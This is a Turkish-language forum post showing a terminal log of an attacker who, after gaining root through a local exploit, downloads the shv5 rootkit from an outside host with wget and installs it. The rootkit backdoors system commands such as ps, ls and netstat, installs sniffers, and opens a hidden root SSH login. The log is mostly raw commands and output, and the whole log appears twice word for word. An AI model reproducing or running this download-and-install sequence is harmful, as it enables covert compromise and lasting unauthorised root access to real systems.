A
Arsenik-tht
Ziyaretçi
Burda yapılan $u dur sistem local exploit adı verilen ve tüm izinlere sahip kullanıcı hakkına sahib yani root haklarına ula$mama vesile olmu$tur..
tüm haklara sahip olduktan sonra sisteme istediğimiz zamanlar tekrar girebilmek için sistemde bir arka kapı ve bu arka kapının anla$ılmaması için bazı unix komutlarının özellikleri deği$tirmi$tir kurduğumuz rootkit ancak piyasadaki bir çok rootkit tarıyıcıları bu rootkitleri kolayca yakalamaktadır..
sisteme rootkit kuruldu saldırganımız sisteme ssh denilen bir protocolle kurban sisteme istediği zaman root haklarına sahip olup bağlanabilmektedir..
Escape character is '^]'.
id;
uid=0(root) gid=0(root) groups=11(httpd)
: command not found
: command not found
whoami;
root
: command not found
: command not found
cd /tmp/.rzr;
: command not found
: command not found
wget www.xxxxx.org/x/xxx/xx/shv5.tgz;tar -zxvf shv5.tgz;cd shv5
;./setup xxxx xxxx;
--12:00:15-- http://www.xxxxx.org/x/xxx/xx/shv5.tgz
=> `shv5.tgz'
Connecting to www.xxxxx.org:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 662,156 [application/x-tar]
0K -> .......... .......... .......... .......... .......... [ 7%]
50K -> .......... .......... .......... .......... .......... [ 15%]
100K -> .......... .......... .......... .......... .......... [ 23%]
150K -> .......... .......... .......... .......... .......... [ 30%]
200K -> .......... .......... .......... .......... .......... [ 38%]
250K -> .......... .......... .......... .......... .......... [ 46%]
300K -> .......... .......... .......... .......... .......... [ 54%]
350K -> .......... .......... .......... .......... .......... [ 61%]
400K -> .......... .......... .......... .......... .......... [ 69%]
450K -> .......... .......... .......... .......... .......... [ 77%]
500K -> .......... .......... .......... .......... .......... [ 85%]
550K -> .......... .......... .......... .......... .......... [ 92%]
600K -> .......... .......... .......... .......... ...... [100%]
12:00:22 (125.05 KB/s) - `shv5.tgz' saved [662156/662156]
shv5/
shv5/setup
shv5/bin.tgz
shv5/conf.tgz
shv5/lib.tgz
shv5/README
shv5/utilz.tgz
[sh]# Installing shv5 ... this wont take long
[sh]# If u think we will patch your holes shoot yourself !
[sh]# so patch manualy and fuck off!
============================================================================
MMMMM MMMMMM
MMM MMMMMMMMM MMMM MMMM MMM
[*] Presenting u shv5-rootkit !
MMM MMMM MMMM MMMM MMMM MMM
[*] Designed for internal use !
MMM MMMMMMM MMMMMMMMMMMM MMM
MMM MMMMMMMM MMMMMMMMMMMM MMM
[*] brought to you by: PinT[x]
MMM MMMM MMMM MMMM MMM
[*] April 2003
MMM MMMM MMMM MMMM MMMM MMM
MMM MMMMMMMMM MMMM MMMM MMM
[*] *** VERY PRIVATE ***
MMM MMM
[*] *** so dont distribute ***
MMMMM -C- -R- -E- -W- MMMMMM
============================================================================
[sh]# backdooring started on xxxxxxx.xxx
[sh]#
[sh]#
[sh]# checking for remote logging... guess not.
[sh]# checking for tripwire... guess not.
[sh]# [Installing trojans....]
[sh]# Using Password : xxxx
[sh]# Using ssh-port : xxxx
[sh]# : ps/ls/top/netstat/ifconfig/find/ and rest backdoored
[sh]#
[sh]# [Installing some utils...]
[sh]# : mirk/synscan/others... moved
[sh]# [Moving our files...]
[sh]# : sniff/parse/sauber/hide moved
[sh]# [Modifying system settings to suite our needs]
[sh]# Checking for vuln-daemons ...
Signal 17 caught by ps (procps version 2.0.6).
Please send bug reports to <[email protected]>
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
chattr: No such file or directory while stating /lib/ldd.so/*
[sh]# tk8 detected and owned ...!!!!
touch: getting attributes of `/etc/inted.conf': No such file or directory
--------------------------------------------------------------------
[sh]# [System Information...]
./setup: /bin/awk: Text file busy
grep: writing output: Broken pipe
[sh]# Hostname :xxxx.xxx ()
./setup: /bin/awk: Text file busy
./setup: /bin/awk: Text file busy
grep: writing output: Broken pipe
[sh]# Arch : -+- bogomips : '
[sh]# Alternative IP : xxx.xxx.xxx.xxx -+- Might be [ 6 ] active adapters.
[sh]# Distribution:
--------------------------------------------------------------------
[sh]# ipchains ... ?
[sh]# lucky for u no ipchains found
--------------------------------------------------------------------
[sh]# iptables ...?
[sh]# lucky for u no iptables found
--------------------------------------------------------------------
[sh]# Just ignore all errors if any !
[sh]# ============================== Backdooring completed in :21 seconds
: command not found
: command not found
kurduk ve sistemden çıktık şimdi sisteme bağlanalım...
ustura@linux:~> ssh [email protected] -p xxxx
[email protected]'s password:
[sh] w.e.l.c.o.m.e
[sh] To The Virtual Reality
[sh] Enjoy and behave !
[root@SH-crew:/root]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
tüm haklara sahip olduktan sonra sisteme istediğimiz zamanlar tekrar girebilmek için sistemde bir arka kapı ve bu arka kapının anla$ılmaması için bazı unix komutlarının özellikleri deği$tirmi$tir kurduğumuz rootkit ancak piyasadaki bir çok rootkit tarıyıcıları bu rootkitleri kolayca yakalamaktadır..
sisteme rootkit kuruldu saldırganımız sisteme ssh denilen bir protocolle kurban sisteme istediği zaman root haklarına sahip olup bağlanabilmektedir..
Escape character is '^]'.
id;
uid=0(root) gid=0(root) groups=11(httpd)
: command not found
: command not found
whoami;
root
: command not found
: command not found
cd /tmp/.rzr;
: command not found
: command not found
wget www.xxxxx.org/x/xxx/xx/shv5.tgz;tar -zxvf shv5.tgz;cd shv5
;./setup xxxx xxxx;
--12:00:15-- http://www.xxxxx.org/x/xxx/xx/shv5.tgz
=> `shv5.tgz'
Connecting to www.xxxxx.org:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 662,156 [application/x-tar]
0K -> .......... .......... .......... .......... .......... [ 7%]
50K -> .......... .......... .......... .......... .......... [ 15%]
100K -> .......... .......... .......... .......... .......... [ 23%]
150K -> .......... .......... .......... .......... .......... [ 30%]
200K -> .......... .......... .......... .......... .......... [ 38%]
250K -> .......... .......... .......... .......... .......... [ 46%]
300K -> .......... .......... .......... .......... .......... [ 54%]
350K -> .......... .......... .......... .......... .......... [ 61%]
400K -> .......... .......... .......... .......... .......... [ 69%]
450K -> .......... .......... .......... .......... .......... [ 77%]
500K -> .......... .......... .......... .......... .......... [ 85%]
550K -> .......... .......... .......... .......... .......... [ 92%]
600K -> .......... .......... .......... .......... ...... [100%]
12:00:22 (125.05 KB/s) - `shv5.tgz' saved [662156/662156]
shv5/
shv5/setup
shv5/bin.tgz
shv5/conf.tgz
shv5/lib.tgz
shv5/README
shv5/utilz.tgz
[sh]# Installing shv5 ... this wont take long
[sh]# If u think we will patch your holes shoot yourself !
[sh]# so patch manualy and fuck off!
============================================================================
MMMMM MMMMMM
MMM MMMMMMMMM MMMM MMMM MMM
[*] Presenting u shv5-rootkit !
MMM MMMM MMMM MMMM MMMM MMM
[*] Designed for internal use !
MMM MMMMMMM MMMMMMMMMMMM MMM
MMM MMMMMMMM MMMMMMMMMMMM MMM
[*] brought to you by: PinT[x]
MMM MMMM MMMM MMMM MMM
[*] April 2003
MMM MMMM MMMM MMMM MMMM MMM
MMM MMMMMMMMM MMMM MMMM MMM
[*] *** VERY PRIVATE ***
MMM MMM
[*] *** so dont distribute ***
MMMMM -C- -R- -E- -W- MMMMMM
============================================================================
[sh]# backdooring started on xxxxxxx.xxx
[sh]#
[sh]#
[sh]# checking for remote logging... guess not.
[sh]# checking for tripwire... guess not.
[sh]# [Installing trojans....]
[sh]# Using Password : xxxx
[sh]# Using ssh-port : xxxx
[sh]# : ps/ls/top/netstat/ifconfig/find/ and rest backdoored
[sh]#
[sh]# [Installing some utils...]
[sh]# : mirk/synscan/others... moved
[sh]# [Moving our files...]
[sh]# : sniff/parse/sauber/hide moved
[sh]# [Modifying system settings to suite our needs]
[sh]# Checking for vuln-daemons ...
Signal 17 caught by ps (procps version 2.0.6).
Please send bug reports to <[email protected]>
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
chattr: No such file or directory while stating /lib/ldd.so/*
[sh]# tk8 detected and owned ...!!!!
touch: getting attributes of `/etc/inted.conf': No such file or directory
--------------------------------------------------------------------
[sh]# [System Information...]
./setup: /bin/awk: Text file busy
grep: writing output: Broken pipe
[sh]# Hostname :xxxx.xxx ()
./setup: /bin/awk: Text file busy
./setup: /bin/awk: Text file busy
grep: writing output: Broken pipe
[sh]# Arch : -+- bogomips : '
[sh]# Alternative IP : xxx.xxx.xxx.xxx -+- Might be [ 6 ] active adapters.
[sh]# Distribution:
--------------------------------------------------------------------
[sh]# ipchains ... ?
[sh]# lucky for u no ipchains found
--------------------------------------------------------------------
[sh]# iptables ...?
[sh]# lucky for u no iptables found
--------------------------------------------------------------------
[sh]# Just ignore all errors if any !
[sh]# ============================== Backdooring completed in :21 seconds
: command not found
: command not found
kurduk ve sistemden çıktık şimdi sisteme bağlanalım...
ustura@linux:~> ssh [email protected] -p xxxx
[email protected]'s password:
[sh] w.e.l.c.o.m.e
[sh] To The Virtual Reality
[sh] Enjoy and behave !
[root@SH-crew:/root]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
